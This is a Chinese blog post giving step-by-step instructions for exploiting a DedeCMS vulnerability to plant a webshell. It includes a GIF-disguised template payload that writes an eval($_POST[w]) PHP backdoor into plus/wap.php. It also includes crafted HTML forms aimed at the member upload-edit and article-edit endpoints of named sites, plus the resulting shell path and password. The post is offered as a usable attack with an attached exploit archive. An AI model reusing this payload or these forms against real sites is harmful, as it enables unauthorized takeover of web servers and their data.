dedecms get shell漏洞利用详细说明

发表时间:2012-04-26

 今天遇到难题,折腾了大半晚上就是为了搞清楚dedecms get shell漏洞如何利用.虽说以前有那样的工具,但是感觉一直用工具不是很给力。问了好几个,终于稍稍有点感触,赶紧记下,免得以后忘记了又找人.

1.注册会员.这个漏洞能利用的前提就是能网站开放会员注册功能.

 

2.上传已经编辑好的.gif文件.这个文件实际是一个已经编辑好的GIF89a头的PHP一句话木马.主要代码:

GIF89a    
{dede:name runphp='yes'}
$fp = @fopen("wap.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[w])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}

上传图片成功后,查看图片的属性,记住图片地址.然后构造以下表单:

<form action="http://www.xxxx.net/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
<input type="hidden" name="aid" value="16" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="../uploads/userup/2/1.gif" /></br>
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="0dayNet" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >提交</button>
</form>

其中红色部分就是上传成功后的图片的路径.

3.发布文章.发布文章的时候,记得所选的目录.文章发布成功之后,选择修改文章,然后查看源代码.构造以下表单:

<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://www.adminjy.net/member/article_edit.php" method="post" enctype="multipart/form-data" onsubmit="return checkSubmit();">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="10130" />
<input type="hidden" name="idhash" value="3753f1b02e103fa06ca3da0f9e809375" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1290955394" />
<input  name="title" type="text" id="title" value="wwwww" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="maomao" maxlength="100" class="intxt" style="width:219px"/>
<input type='text' name='dede_addonfields' value="templet,htmltext;">
<input type='hidden' name='templet' value="../uploads/userup/12/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<p>

同样注意红色部分,改成相应的.还有修改一下部分:

<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='28'class='option3' selected=''>getshell</option>
</select>            <span style="color:#F00">*</span>(不能选择带颜色的分类)

修改发布成功的文章,然后查看源代码,查看对应的栏目value值,然后修改红色部分.

然后打开修改好的0day利用程序,输入验证码,提交.提示发布成功,然后选择查看文章.

生成的一句话路径为../plus/wap.php 链接密码为:w 具体的后门名和密码请根据你的gif文件来访问.

附上利用程序:

dedecms0day.rar

------分割线---------------------------------------

Tags:

留个脚印

点击我更换图片 (请输入验证码)

最新评论